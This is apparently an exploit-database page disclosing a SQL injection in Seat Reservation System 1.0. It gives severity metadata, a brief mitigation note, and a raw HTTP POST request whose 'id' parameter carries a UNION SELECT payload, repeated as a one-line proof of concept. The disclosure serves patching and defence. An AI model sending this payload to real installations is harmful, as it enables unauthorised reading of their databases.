Seat Reservation System 1.0 - 'id' SQL Injection

vendor:

Seat Reservation System

by:

Augkim

8.8

CVSS

HIGH

SQL Injection

CWE

Product Name: Seat Reservation System

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:sourcecodester:seat_reservation_system_using_php:1.0

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Apache2

2020

Seat Reservation System 1.0 – ‘id’ SQL Injection

An SQL injection vulnerability exists in the Seat Reservation System 1.0 web application. An attacker can send a specially crafted HTTP POST request to the vulnerable application to inject malicious SQL queries into the application. This can be exploited to gain access to sensitive information from the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

# Exploit Title: Seat Reservation System 1.0 - 'id' SQL Injection
# Date: 2020-09-20
# Exploit Author: Augkim
# Vendor Homepage: https://www.sourcecodester.com/php/14452/seat-reservation-system-movie-theater-project-using-phpmysql.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/seat-reservation-system-using-php_0.zip
# Tested on: Apache2


POST
/URL/index.php?page=reserve&id=''union%20select%201,version(),3,4,5,6,7,8--
HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0)
Gecko/20100101 Firefox/80.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/sere/
Connection: close
Cookie: PHPSESSID=lmuj4akmh6q1flmcbnuisgttom
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Origin: foo.example.org


PoC:
/URL/index.php?page=reserve&id=''union%20select%201,version(),3,4,5,6,7,8--